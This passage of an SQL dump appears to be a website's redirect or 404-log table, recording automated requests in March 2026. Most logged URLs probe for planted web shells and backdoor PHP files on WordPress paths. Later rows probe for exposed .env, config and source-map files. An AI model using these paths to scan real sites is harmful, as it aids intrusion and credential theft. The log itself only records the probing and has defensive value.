00:00:00',301),(59371,'http://3s-technologies.com.tr/tr/aee.php',NULL,'','',9,0,'2026-03-12 07:26:52','0000-00-00 00:00:00',301),(59372,'http://3s-technologies.com.tr/tr/vir-v2.php',NULL,'','',1,0,'2026-03-12 07:26:57','0000-00-00 00:00:00',301),(59373,'http://3s-technologies.com.tr/tr/hckpe.php',NULL,'','',1,0,'2026-03-12 07:27:03','0000-00-00 00:00:00',301),(59374,'http://3s-technologies.com.tr/tr/sd.php',NULL,'','',2,0,'2026-03-12 07:27:04','0000-00-00 00:00:00',301),(59375,'http://3s-technologies.com.tr/tr/wp-admin/maint/max.php',NULL,'','',4,0,'2026-03-12 07:27:06','0000-00-00 00:00:00',301),(59376,'http://3s-technologies.com.tr/tr/iindv.php',NULL,'','',16,0,'2026-03-12 07:27:07','0000-00-00 00:00:00',301),(59377,'http://3s-technologies.com.tr/tr/sqaoi.php',NULL,'','',1,0,'2026-03-12 07:27:08','0000-00-00 00:00:00',301),(59378,'http://3s-technologies.com.tr/tr/wp-admin/privacy.php',NULL,'','',6,0,'2026-03-12 07:27:09','0000-00-00 00:00:00',301),(59379,'http://3s-technologies.com.tr/tr/aapig.php',NULL,'','',7,0,'2026-03-12 07:27:09','0000-00-00 00:00:00',301),(59380,'http://3s-technologies.com.tr/tr/fs8.php',NULL,'','',1,0,'2026-03-12 07:27:10','0000-00-00 00:00:00',301),(59381,'http://3s-technologies.com.tr/tr/kllib.php',NULL,'','',1,0,'2026-03-12 07:27:18','0000-00-00 00:00:00',301),(59382,'http://3s-technologies.com.tr/tr/bwjjt.php',NULL,'','',1,0,'2026-03-12 07:27:24','0000-00-00 00:00:00',301),(59383,'http://3s-technologies.com.tr/tr/karma_b001.php',NULL,'','',1,0,'2026-03-12 07:27:31','0000-00-00 00:00:00',301),(59384,'http://3s-technologies.com.tr/tr/karma_e76a.php',NULL,'','',1,0,'2026-03-12 07:27:31','0000-00-00 00:00:00',301),(59385,'http://3s-technologies.com.tr/tr/karma_0cc5.php',NULL,'','',1,0,'2026-03-12 07:27:32','0000-00-00 00:00:00',301),(59386,'http://3s-technologies.com.tr/tr/wp-admin/images/acxx.php?p=',NULL,'','',1,0,'2026-03-12 07:27:33','0000-00-00 00:00:00',301),(59387,'http://3s-technologies.com.tr/tr/receiver.php',NULL,'','',1,0,'2026-03-12 07:27:34','0000-00-00 00:00:00',301),(59388,'http://3s-technologies.com.tr/tr/mis.php',NULL,'','',4,0,'2026-03-12 07:27:35','0000-00-00 00:00:00',301),(59389,'http://3s-technologies.com.tr/tr/temp1.php',NULL,'','',3,0,'2026-03-12 07:27:37','0000-00-00 00:00:00',301),(59390,'http://3s-technologies.com.tr/tr/ocdzo.php',NULL,'','',1,0,'2026-03-12 07:27:38','0000-00-00 00:00:00',301),(59391,'http://3s-technologies.com.tr/tr/yitlu.php',NULL,'','',1,0,'2026-03-12 07:27:39','0000-00-00 00:00:00',301),(59392,'http://3s-technologies.com.tr/tr/xmzrp.php',NULL,'','',1,0,'2026-03-12 07:27:40','0000-00-00 00:00:00',301),(59393,'http://3s-technologies.com.tr/tr/weoci.php',NULL,'','',1,0,'2026-03-12 07:27:40','0000-00-00 00:00:00',301),(59394,'http://3s-technologies.com.tr/tr/wfsjt.php',NULL,'','',1,0,'2026-03-12 07:27:41','0000-00-00 00:00:00',301),(59395,'http://3s-technologies.com.tr/tr/vhitr.php',NULL,'','',1,0,'2026-03-12 07:27:42','0000-00-00 00:00:00',301),(59396,'http://3s-technologies.com.tr/tr/uvlyi.php',NULL,'','',1,0,'2026-03-12 07:27:43','0000-00-00 00:00:00',301),(59397,'http://3s-technologies.com.tr/tr/tbmfx.php',NULL,'','',1,0,'2026-03-12 07:27:44','0000-00-00 00:00:00',301),(59398,'http://3s-technologies.com.tr/tr/rqiup.php',NULL,'','',1,0,'2026-03-12 07:27:44','0000-00-00 00:00:00',301),(59399,'http://3s-technologies.com.tr/tr/swqjx.php',NULL,'','',1,0,'2026-03-12 07:27:45','0000-00-00 00:00:00',301),(59400,'http://3s-technologies.com.tr/tr/mfv7ys.php',NULL,'','',1,0,'2026-03-12 07:27:46','0000-00-00 00:00:00',301),(59401,'http://3s-technologies.com.tr/tr/jxhre.php',NULL,'','',1,0,'2026-03-12 07:27:47','0000-00-00 00:00:00',301),(59402,'http://3s-technologies.com.tr/tr/fsjne.php',NULL,'','',1,0,'2026-03-12 07:27:47','0000-00-00 00:00:00',301),(59403,'http://3s-technologies.com.tr/tr/fvlje.php',NULL,'','',1,0,'2026-03-12 07:27:48','0000-00-00 00:00:00',301),(59404,'http://3s-technologies.com.tr/tr/cqrrg.php',NULL,'','',1,0,'2026-03-12 07:27:49','0000-00-00 00:00:00',301),(59405,'http://3s-technologies.com.tr/tr/euhpb.php',NULL,'','',1,0,'2026-03-12 07:27:49','0000-00-00 00:00:00',301),(59406,'http://mail.3s-technologies.com.tr/tr/hnikt.php',NULL,'','',1,0,'2026-03-12 21:45:45','0000-00-00 00:00:00',301),(59407,'http://mail.3s-technologies.com.tr/tr/awh.php',NULL,'','',10,0,'2026-03-12 21:45:45','0000-00-00 00:00:00',301),(59408,'http://mail.3s-technologies.com.tr/tr/34.php',NULL,'','',1,0,'2026-03-12 21:45:46','0000-00-00 00:00:00',301),(59409,'http://mail.3s-technologies.com.tr/tr/rafa.php',NULL,'','',1,0,'2026-03-12 21:45:47','0000-00-00 00:00:00',301),(59410,'http://mail.3s-technologies.com.tr/tr/gu.php',NULL,'','',1,0,'2026-03-12 21:45:47','0000-00-00 00:00:00',301),(59411,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/pridmag/js.php',NULL,'','',1,0,'2026-03-12 21:45:48','0000-00-00 00:00:00',301),(59412,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/pridmag/34.php',NULL,'','',1,0,'2026-03-12 21:45:49','0000-00-00 00:00:00',301),(59413,'http://3s-technologies.com.tr/tr/hnikt.php',NULL,'','',1,0,'2026-03-12 22:19:45','0000-00-00 00:00:00',301),(59414,'http://3s-technologies.com.tr/tr/gu.php',NULL,'','',1,0,'2026-03-12 22:19:48','0000-00-00 00:00:00',301),(59415,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/js.php',NULL,'','',1,0,'2026-03-12 22:19:50','0000-00-00 00:00:00',301),(59416,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/34.php',NULL,'','',1,0,'2026-03-12 22:19:51','0000-00-00 00:00:00',301),(59417,'http://3s-technologies.com.tr/tr/ah25',NULL,'','',1,0,'2026-03-13 00:30:02','0000-00-00 00:00:00',301),(59418,'http://3s-technologies.com.tr/tr/public/rip.php',NULL,'','',1,0,'2026-03-13 00:30:07','0000-00-00 00:00:00',301),(59419,'http://mail.3s-technologies.com.tr/tr/wk/index.php',NULL,'','',4,0,'2026-03-13 19:48:06','0000-00-00 00:00:00',301),(59420,'http://mail.3s-technologies.com.tr/tr/wp-admin/images',NULL,'','',4,0,'2026-03-13 19:48:41','0000-00-00 00:00:00',301),(59421,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/src/response/about.php',NULL,'','',3,0,'2026-03-13 19:48:42','0000-00-00 00:00:00',301),(59422,'http://mail.3s-technologies.com.tr/tr/wp-includes/html-api',NULL,'','',4,0,'2026-03-13 19:48:43','0000-00-00 00:00:00',301),(59423,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm',NULL,'','',3,0,'2026-03-13 19:48:44','0000-00-00 00:00:00',301),(59424,'http://mail.3s-technologies.com.tr/tr/wp-includes/images',NULL,'','',4,0,'2026-03-13 19:48:48','0000-00-00 00:00:00',301),(59425,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore',NULL,'','',3,0,'2026-03-13 19:48:49','0000-00-00 00:00:00',301),(59426,'http://mail.3s-technologies.com.tr/tr/css/autoload_classmap.php',NULL,'','',3,0,'2026-03-13 19:49:04','0000-00-00 00:00:00',301),(59427,'http://mail.3s-technologies.com.tr/tr/fx.php',NULL,'','',3,0,'2026-03-13 19:49:04','0000-00-00 00:00:00',301),(59428,'http://mail.3s-technologies.com.tr/tr/god4m.php',NULL,'','',3,0,'2026-03-13 19:49:06','0000-00-00 00:00:00',301),(59429,'http://mail.3s-technologies.com.tr/tr/mari.php',NULL,'','',3,0,'2026-03-13 19:49:07','0000-00-00 00:00:00',301),(59430,'http://mail.3s-technologies.com.tr/tr/tmp.php',NULL,'','',4,0,'2026-03-13 19:49:09','0000-00-00 00:00:00',301),(59431,'http://mail.3s-technologies.com.tr/tr/wp-admin/js',NULL,'','',6,0,'2026-03-13 19:49:10','0000-00-00 00:00:00',301),(59432,'http://mail.3s-technologies.com.tr/tr/wp-admin/a.php',NULL,'','',2,0,'2026-03-13 19:49:10','0000-00-00 00:00:00',301),(59433,'http://mail.3s-technologies.com.tr/tr/wp-admin/alfa.php',NULL,'','',4,0,'2026-03-13 19:49:11','0000-00-00 00:00:00',301),(59434,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors',NULL,'','',3,0,'2026-03-13 19:49:12','0000-00-00 00:00:00',301),(59435,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets',NULL,'','',3,0,'2026-03-13 19:49:13','0000-00-00 00:00:00',301),(59436,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/index.php',NULL,'','',3,0,'2026-03-13 19:49:13','0000-00-00 00:00:00',301),(59437,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/core-plugin/include.php',NULL,'','',2,0,'2026-03-13 19:49:14','0000-00-00 00:00:00',301),(59438,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/test1.php',NULL,'','',2,0,'2026-03-13 19:49:15','0000-00-00 00:00:00',301),(59439,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/crop/cropper.php',NULL,'','',2,0,'2026-03-13 19:49:16','0000-00-00 00:00:00',301),(59440,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3',NULL,'','',3,0,'2026-03-13 19:49:17','0000-00-00 00:00:00',301),(59441,'http://3s-technologies.com.tr/tr/wk/index.php',NULL,'','',32,0,'2026-03-14 00:35:08','0000-00-00 00:00:00',301),(59442,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/response/about.php',NULL,'','',23,0,'2026-03-14 00:35:38','0000-00-00 00:00:00',301),(59443,'http://3s-technologies.com.tr/tr/css/autoload_classmap.php',NULL,'','',23,0,'2026-03-14 00:36:02','0000-00-00 00:00:00',301),(59444,'http://3s-technologies.com.tr/tr/wp-admin/a.php',NULL,'','',20,0,'2026-03-14 00:36:08','0000-00-00 00:00:00',301),(59445,'http://3s-technologies.com.tr/tr/wp-includes/ixr/test1.php',NULL,'','',20,0,'2026-03-14 00:36:13','0000-00-00 00:00:00',301),(59446,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/cropper.php',NULL,'','',20,0,'2026-03-14 00:36:14','0000-00-00 00:00:00',301),(59447,'http://3s-technologies.com.tr/tr/css.phphmgm.ir',NULL,'','',1,0,'2026-03-14 03:33:19','0000-00-00 00:00:00',301),(59448,'http://3s-technologies.com.tr/tr/public/file.php',NULL,'','',13,0,'2026-03-14 04:59:47','0000-00-00 00:00:00',301),(59449,'http://www.3s-technologies.com.tr/tr/wk/index.php',NULL,'','',1,0,'2026-03-14 05:23:32','0000-00-00 00:00:00',301),(59450,'http://www.3s-technologies.com.tr/tr/sf.php',NULL,'','',4,0,'2026-03-14 05:23:55','0000-00-00 00:00:00',301),(59451,'http://www.3s-technologies.com.tr/tr/wp-includes',NULL,'','',1,0,'2026-03-14 05:23:59','0000-00-00 00:00:00',301),(59452,'http://www.3s-technologies.com.tr/tr/wp-admin/images',NULL,'','',1,0,'2026-03-14 05:24:02','0000-00-00 00:00:00',301),(59453,'http://www.3s-technologies.com.tr/tr/wp-includes/requests/src/response/about.php',NULL,'','',1,0,'2026-03-14 05:24:03','0000-00-00 00:00:00',301),(59454,'http://www.3s-technologies.com.tr/tr/wp-includes/html-api',NULL,'','',1,0,'2026-03-14 05:24:03','0000-00-00 00:00:00',301),(59455,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm',NULL,'','',1,0,'2026-03-14 05:24:05','0000-00-00 00:00:00',301),(59456,'http://www.3s-technologies.com.tr/tr/wp-includes/images',NULL,'','',1,0,'2026-03-14 05:24:09','0000-00-00 00:00:00',301),(59457,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore',NULL,'','',1,0,'2026-03-14 05:24:10','0000-00-00 00:00:00',301),(59458,'http://www.3s-technologies.com.tr/tr/aw.php',NULL,'','',1,0,'2026-03-14 05:24:20','0000-00-00 00:00:00',301),(59459,'http://www.3s-technologies.com.tr/tr/test1.php',NULL,'','',5,0,'2026-03-14 05:24:23','0000-00-00 00:00:00',301),(59460,'http://www.3s-technologies.com.tr/tr/css/autoload_classmap.php',NULL,'','',1,0,'2026-03-14 05:24:25','0000-00-00 00:00:00',301),(59461,'http://www.3s-technologies.com.tr/tr/fx.php',NULL,'','',1,0,'2026-03-14 05:24:25','0000-00-00 00:00:00',301),(59462,'http://www.3s-technologies.com.tr/tr/gelay.php',NULL,'','',1,0,'2026-03-14 05:24:26','0000-00-00 00:00:00',301),(59463,'http://www.3s-technologies.com.tr/tr/god4m.php',NULL,'','',1,0,'2026-03-14 05:24:27','0000-00-00 00:00:00',301),(59464,'http://www.3s-technologies.com.tr/tr/mari.php',NULL,'','',1,0,'2026-03-14 05:24:28','0000-00-00 00:00:00',301),(59465,'http://www.3s-technologies.com.tr/tr/tmp.php',NULL,'','',1,0,'2026-03-14 05:24:30','0000-00-00 00:00:00',301),(59466,'http://www.3s-technologies.com.tr/tr/wp-admin/js',NULL,'','',1,0,'2026-03-14 05:24:30','0000-00-00 00:00:00',301),(59467,'http://www.3s-technologies.com.tr/tr/wp-admin/a.php',NULL,'','',1,0,'2026-03-14 05:24:31','0000-00-00 00:00:00',301),(59468,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors',NULL,'','',1,0,'2026-03-14 05:24:32','0000-00-00 00:00:00',301),(59469,'http://www.3s-technologies.com.tr/tr/wp-admin/js/widgets',NULL,'','',1,0,'2026-03-14 05:24:33','0000-00-00 00:00:00',301),(59470,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/test1.php',NULL,'','',1,0,'2026-03-14 05:24:35','0000-00-00 00:00:00',301),(59471,'http://www.3s-technologies.com.tr/tr/wp-includes/js/crop/cropper.php',NULL,'','',1,0,'2026-03-14 05:24:36','0000-00-00 00:00:00',301),(59472,'http://www.3s-technologies.com.tr/tr/wp-content/themes',NULL,'','',1,0,'2026-03-14 05:24:37','0000-00-00 00:00:00',301),(59473,'http://www.3s-technologies.com.tr/tr/wp-includes/id3',NULL,'','',1,0,'2026-03-14 05:24:37','0000-00-00 00:00:00',301),(59474,'http://mail.3s-technologies.com.tr/tr/sallu.php',NULL,'','',12,0,'2026-03-14 07:45:07','0000-00-00 00:00:00',301),(59475,'http://mail.3s-technologies.com.tr/tr/fyiiz.php',NULL,'','',4,0,'2026-03-14 07:55:24','0000-00-00 00:00:00',301),(59476,'http://mail.3s-technologies.com.tr/tr/dragonshell.php',NULL,'','',9,0,'2026-03-14 07:55:26','0000-00-00 00:00:00',301),(59477,'http://mail.3s-technologies.com.tr/tr/xc0252.php',NULL,'','',7,0,'2026-03-14 07:55:27','0000-00-00 00:00:00',301),(59478,'http://mail.3s-technologies.com.tr/tr/595.php',NULL,'','',4,0,'2026-03-14 07:55:29','0000-00-00 00:00:00',301),(59479,'http://mail.3s-technologies.com.tr/tr/x1.php',NULL,'','',7,0,'2026-03-14 07:55:30','0000-00-00 00:00:00',301),(59480,'http://mail.3s-technologies.com.tr/tr/scbpb.php',NULL,'','',1,0,'2026-03-14 07:55:32','0000-00-00 00:00:00',301),(59481,'http://mail.3s-technologies.com.tr/tr/ta0ol.php',NULL,'','',18,0,'2026-03-14 07:55:33','0000-00-00 00:00:00',301),(59482,'http://mail.3s-technologies.com.tr/tr/xvs.php',NULL,'','',4,0,'2026-03-14 07:55:35','0000-00-00 00:00:00',301),(59483,'http://mail.3s-technologies.com.tr/tr/xwx1.php',NULL,'','',45,0,'2026-03-14 07:55:36','0000-00-00 00:00:00',301),(59484,'http://mail.3s-technologies.com.tr/tr/ass.php',NULL,'','',12,0,'2026-03-14 07:55:38','0000-00-00 00:00:00',301),(59485,'http://mail.3s-technologies.com.tr/tr/gkl.php',NULL,'','',1,0,'2026-03-14 07:55:39','0000-00-00 00:00:00',301),(59486,'http://mail.3s-technologies.com.tr/tr/wps.php',NULL,'','',15,0,'2026-03-14 07:55:40','0000-00-00 00:00:00',301),(59487,'http://mail.3s-technologies.com.tr/tr/wp-includes/app.php',NULL,'','',4,0,'2026-03-14 07:55:43','0000-00-00 00:00:00',301),(59488,'http://mail.3s-technologies.com.tr/tr/sw.php',NULL,'','',3,0,'2026-03-14 07:55:44','0000-00-00 00:00:00',301),(59489,'http://mail.3s-technologies.com.tr/tr/vfr.php',NULL,'','',1,0,'2026-03-14 07:55:44','0000-00-00 00:00:00',301),(59490,'http://mail.3s-technologies.com.tr/tr/wgift1.php',NULL,'','',17,0,'2026-03-14 07:55:45','0000-00-00 00:00:00',301),(59491,'http://mail.3s-technologies.com.tr/tr/zogy1.php',NULL,'','',14,0,'2026-03-14 07:55:47','0000-00-00 00:00:00',301),(59492,'http://mail.3s-technologies.com.tr/tr/zoper1.php',NULL,'','',20,0,'2026-03-14 07:55:47','0000-00-00 00:00:00',301),(59493,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/jcrop.php',NULL,'','',4,0,'2026-03-14 07:55:48','0000-00-00 00:00:00',301),(59494,'http://mail.3s-technologies.com.tr/tr/acjsn.php',NULL,'','',1,0,'2026-03-14 07:55:50','0000-00-00 00:00:00',301),(59495,'http://mail.3s-technologies.com.tr/tr/adnks.php',NULL,'','',1,0,'2026-03-14 07:55:50','0000-00-00 00:00:00',301),(59496,'http://mail.3s-technologies.com.tr/tr/ahiqq.php',NULL,'','',1,0,'2026-03-14 07:55:51','0000-00-00 00:00:00',301),(59497,'http://mail.3s-technologies.com.tr/tr/an9.php',NULL,'','',1,0,'2026-03-14 07:55:54','0000-00-00 00:00:00',301),(59498,'http://mail.3s-technologies.com.tr/tr/aqups.php',NULL,'','',1,0,'2026-03-14 07:55:54','0000-00-00 00:00:00',301),(59499,'http://mail.3s-technologies.com.tr/tr/bpltp.php',NULL,'','',1,0,'2026-03-14 07:55:55','0000-00-00 00:00:00',301),(59500,'http://mail.3s-technologies.com.tr/tr/byp9.php',NULL,'','',1,0,'2026-03-14 07:55:57','0000-00-00 00:00:00',301),(59501,'http://mail.3s-technologies.com.tr/tr/fs9.php',NULL,'','',2,0,'2026-03-14 07:55:58','0000-00-00 00:00:00',301),(59502,'http://mail.3s-technologies.com.tr/tr/genco.php',NULL,'','',1,0,'2026-03-14 07:55:59','0000-00-00 00:00:00',301),(59503,'http://mail.3s-technologies.com.tr/tr/p23duw.php',NULL,'','',1,0,'2026-03-14 07:55:59','0000-00-00 00:00:00',301),(59504,'http://mail.3s-technologies.com.tr/tr/pu8.php',NULL,'','',1,0,'2026-03-14 07:56:01','0000-00-00 00:00:00',301),(59505,'http://mail.3s-technologies.com.tr/tr/aifa.php',NULL,'','',5,0,'2026-03-14 07:56:02','0000-00-00 00:00:00',301),(59506,'http://mail.3s-technologies.com.tr/tr/aee.php',NULL,'','',8,0,'2026-03-14 07:56:03','0000-00-00 00:00:00',301),(59507,'http://mail.3s-technologies.com.tr/tr/vir-v2.php',NULL,'','',1,0,'2026-03-14 07:56:08','0000-00-00 00:00:00',301),(59508,'http://mail.3s-technologies.com.tr/tr/hckpe.php',NULL,'','',1,0,'2026-03-14 07:56:14','0000-00-00 00:00:00',301),(59509,'http://mail.3s-technologies.com.tr/tr/sd.php',NULL,'','',2,0,'2026-03-14 07:56:16','0000-00-00 00:00:00',301),(59510,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/max.php',NULL,'','',4,0,'2026-03-14 07:56:17','0000-00-00 00:00:00',301),(59511,'http://mail.3s-technologies.com.tr/tr/iindv.php',NULL,'','',4,0,'2026-03-14 07:56:18','0000-00-00 00:00:00',301),(59512,'http://mail.3s-technologies.com.tr/tr/sqaoi.php',NULL,'','',1,0,'2026-03-14 07:56:19','0000-00-00 00:00:00',301),(59513,'http://mail.3s-technologies.com.tr/tr/wp-admin/privacy.php',NULL,'','',4,0,'2026-03-14 07:56:20','0000-00-00 00:00:00',301),(59514,'http://mail.3s-technologies.com.tr/tr/aapig.php',NULL,'','',4,0,'2026-03-14 07:56:21','0000-00-00 00:00:00',301),(59515,'http://mail.3s-technologies.com.tr/tr/fs8.php',NULL,'','',1,0,'2026-03-14 07:56:21','0000-00-00 00:00:00',301),(59516,'http://mail.3s-technologies.com.tr/tr/kllib.php',NULL,'','',1,0,'2026-03-14 07:56:30','0000-00-00 00:00:00',301),(59517,'http://mail.3s-technologies.com.tr/tr/bwjjt.php',NULL,'','',1,0,'2026-03-14 07:56:38','0000-00-00 00:00:00',301),(59518,'http://mail.3s-technologies.com.tr/tr/karma_b001.php',NULL,'','',1,0,'2026-03-14 07:56:44','0000-00-00 00:00:00',301),(59519,'http://mail.3s-technologies.com.tr/tr/karma_e76a.php',NULL,'','',1,0,'2026-03-14 07:56:45','0000-00-00 00:00:00',301),(59520,'http://mail.3s-technologies.com.tr/tr/karma_0cc5.php',NULL,'','',1,0,'2026-03-14 07:56:46','0000-00-00 00:00:00',301),(59521,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/acxx.php?p=',NULL,'','',1,0,'2026-03-14 07:56:47','0000-00-00 00:00:00',301),(59522,'http://mail.3s-technologies.com.tr/tr/receiver.php',NULL,'','',1,0,'2026-03-14 07:56:52','0000-00-00 00:00:00',301),(59523,'http://mail.3s-technologies.com.tr/tr/mis.php',NULL,'','',4,0,'2026-03-14 07:56:53','0000-00-00 00:00:00',301),(59524,'http://mail.3s-technologies.com.tr/tr/temp1.php',NULL,'','',2,0,'2026-03-14 07:56:54','0000-00-00 00:00:00',301),(59525,'http://mail.3s-technologies.com.tr/tr/ocdzo.php',NULL,'','',1,0,'2026-03-14 07:56:56','0000-00-00 00:00:00',301),(59526,'http://mail.3s-technologies.com.tr/tr/yitlu.php',NULL,'','',1,0,'2026-03-14 07:56:57','0000-00-00 00:00:00',301),(59527,'http://mail.3s-technologies.com.tr/tr/xmzrp.php',NULL,'','',1,0,'2026-03-14 07:56:57','0000-00-00 00:00:00',301),(59528,'http://mail.3s-technologies.com.tr/tr/weoci.php',NULL,'','',1,0,'2026-03-14 07:56:58','0000-00-00 00:00:00',301),(59529,'http://mail.3s-technologies.com.tr/tr/wfsjt.php',NULL,'','',1,0,'2026-03-14 07:56:59','0000-00-00 00:00:00',301),(59530,'http://mail.3s-technologies.com.tr/tr/vhitr.php',NULL,'','',1,0,'2026-03-14 07:57:00','0000-00-00 00:00:00',301),(59531,'http://mail.3s-technologies.com.tr/tr/uvlyi.php',NULL,'','',1,0,'2026-03-14 07:57:00','0000-00-00 00:00:00',301),(59532,'http://mail.3s-technologies.com.tr/tr/tbmfx.php',NULL,'','',1,0,'2026-03-14 07:57:02','0000-00-00 00:00:00',301),(59533,'http://mail.3s-technologies.com.tr/tr/rqiup.php',NULL,'','',1,0,'2026-03-14 07:57:03','0000-00-00 00:00:00',301),(59534,'http://mail.3s-technologies.com.tr/tr/swqjx.php',NULL,'','',1,0,'2026-03-14 07:57:04','0000-00-00 00:00:00',301),(59535,'http://mail.3s-technologies.com.tr/tr/mfv7ys.php',NULL,'','',1,0,'2026-03-14 07:57:05','0000-00-00 00:00:00',301),(59536,'http://mail.3s-technologies.com.tr/tr/jxhre.php',NULL,'','',1,0,'2026-03-14 07:57:05','0000-00-00 00:00:00',301),(59537,'http://mail.3s-technologies.com.tr/tr/fsjne.php',NULL,'','',1,0,'2026-03-14 07:57:06','0000-00-00 00:00:00',301),(59538,'http://mail.3s-technologies.com.tr/tr/fvlje.php',NULL,'','',1,0,'2026-03-14 07:57:07','0000-00-00 00:00:00',301),(59539,'http://mail.3s-technologies.com.tr/tr/cqrrg.php',NULL,'','',1,0,'2026-03-14 07:57:07','0000-00-00 00:00:00',301),(59540,'http://mail.3s-technologies.com.tr/tr/euhpb.php',NULL,'','',1,0,'2026-03-14 07:57:09','0000-00-00 00:00:00',301),(59541,'https://3s-technologies.com.tr/tr/wp-content/plugins/pwnd-1/pwnd.php',NULL,'','',1,0,'2026-03-14 13:36:25','0000-00-00 00:00:00',301),(59542,'https://3s-technologies.com.tr/tr/wp-content/worksec.php',NULL,'','',1,0,'2026-03-14 13:36:29','0000-00-00 00:00:00',301),(59543,'https://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/404.php',NULL,'','',1,0,'2026-03-14 13:36:30','0000-00-00 00:00:00',301),(59544,'https://3s-technologies.com.tr/tr/wp-content/cache/index.php',NULL,'','',1,0,'2026-03-14 13:36:31','0000-00-00 00:00:00',301),(59545,'https://3s-technologies.com.tr/tr/wp-content/upgrade/index.php',NULL,'','',1,0,'2026-03-14 13:36:35','0000-00-00 00:00:00',301),(59546,'https://3s-technologies.com.tr/tr/bundle.js.map',NULL,'https://3s-technologies.com.tr/bundle.js.map','',1,0,'2026-03-14 22:27:10','0000-00-00 00:00:00',301),(59547,'https://3s-technologies.com.tr/en/.env.local',NULL,'https://3s-technologies.com.tr/.env.local','',6,0,'2026-03-14 22:27:11','0000-00-00 00:00:00',301),(59548,'https://3s-technologies.com.tr/tr/main.js.map',NULL,'https://3s-technologies.com.tr/main.js.map','',2,0,'2026-03-14 22:27:11','0000-00-00 00:00:00',301),(59549,'https://3s-technologies.com.tr/tr/vendor.js.map',NULL,'https://3s-technologies.com.tr/vendor.js.map','',1,0,'2026-03-14 22:27:12','0000-00-00 00:00:00',301),(59550,'https://3s-technologies.com.tr/en/.env.prod',NULL,'https://3s-technologies.com.tr/.env.prod','',1,0,'2026-03-14 22:27:12','0000-00-00 00:00:00',301),(59551,'https://3s-technologies.com.tr/tr/app.js.map',NULL,'https://3s-technologies.com.tr/app.js.map','',1,0,'2026-03-14 22:27:13','0000-00-00 00:00:00',301),(59552,'https://3s-technologies.com.tr/en/.env.backup',NULL,'https://3s-technologies.com.tr/.env.backup','',4,0,'2026-03-14 22:27:13','0000-00-00 00:00:00',301),(59553,'https://3s-technologies.com.tr/tr/runtime.js.map',NULL,'https://3s-technologies.com.tr/runtime.js.map','',2,0,'2026-03-14 22:27:13','0000-00-00 00:00:00',301),(59554,'https://3s-technologies.com.tr/tr/commons.js.map',NULL,'https://3s-technologies.com.tr/commons.js.map','',1,0,'2026-03-14 22:27:14','0000-00-00 00:00:00',301),(59555,'https://3s-technologies.com.tr/en/.env.old',NULL,'https://3s-technologies.com.tr/.env.old','',4,0,'2026-03-14 22:27:15','0000-00-00 00:00:00',301),(59556,'https://3s-technologies.com.tr/tr/_next/static/chunks/main.js.map',NULL,'https://3s-technologies.com.tr/_next/static/chunks/main.js.map','',1,0,'2026-03-14 22:27:15','0000-00-00 00:00:00',301),(59557,'https://3s-technologies.com.tr/en/.env.dev',NULL,'https://3s-technologies.com.tr/.env.dev','',1,0,'2026-03-14 22:27:16','0000-00-00 00:00:00',301),(59558,'https://3s-technologies.com.tr/tr/_next/static/chunks/webpack.js.map',NULL,'https://3s-technologies.com.tr/_next/static/chunks/webpack.js.map','',1,0,'2026-03-14 22:27:16','0000-00-00 00:00:00',301),(59559,'https://3s-technologies.com.tr/en/env.js',NULL,'https://3s-technologies.com.tr/env.js','',3,0,'2026-03-14 22:27:16','0000-00-00 00:00:00',301),(59560,'https://3s-technologies.com.tr/tr/_next/static/chunks/pages/_app.js.map',NULL,'https://3s-technologies.com.tr/_next/static/chunks/pages/_app.js.map','',1,0,'2026-03-14 22:27:16','0000-00-00 00:00:00',301),(59561,'https://3s-technologies.com.tr/en/env.json',NULL,'https://3s-technologies.com.tr/env.json','',3,0,'2026-03-14 22:27:17','0000-00-00 00:00:00',301),(59562,'https://3s-technologies.com.tr/tr/_next/static/chunks/framework.js.map',NULL,'https://3s-technologies.com.tr/_next/static/chunks/framework.js.map','',1,0,'2026-03-14 22:27:17','0000-00-00 00:00:00',301),(59563,'https://3s-technologies.com.tr/tr/_nuxt/app.js.map',NULL,'https://3s-technologies.com.tr/_nuxt/app.js.map','',1,0,'2026-03-14 22:27:17','0000-00-00 00:00:00',301),(59564,'https://3s-technologies.com.tr/en/.env.example',NULL,'https://3s-technologies.com.tr/.env.example','',4,0,'2026-03-14 22:27:18','0000-00-00 00:00:00',301),(59565,'https://3s-technologies.com.tr/tr/_nuxt/vendors.js.map',NULL,'https://3s-technologies.com.tr/_nuxt/vendors.js.map','',1,0,'2026-03-14 22:27:18','0000-00-00 00:00:00',301),(59566,'https://3s-technologies.com.tr/en/.env.staging',NULL,'https://3s-technologies.com.tr/.env.staging','',1,0,'2026-03-14 22:27:18','0000-00-00 00:00:00',301),(59567,'https://3s-technologies.com.tr/tr/_nuxt/commons.js.map',NULL,'https://3s-technologies.com.tr/_nuxt/commons.js.map','',1,0,'2026-03-14 22:27:19','0000-00-00 00:00:00',301),(59568,'https://3s-technologies.com.tr/tr/polyfills.js.map',NULL,'https://3s-technologies.com.tr/polyfills.js.map','',1,0,'2026-03-14 22:27:21','0000-00-00 00:00:00',301),(59569,'https://3s-technologies.com.tr/en/config.json',NULL,'https://3s-technologies.com.tr/config.json','',4,0,'2026-03-14 22:27:21','0000-00-00 00:00:00',301),(59570,'https://3s-technologies.com.tr/en/config.yml',NULL,'https://3s-technologies.com.tr/config.yml','',1,0,'2026-03-14 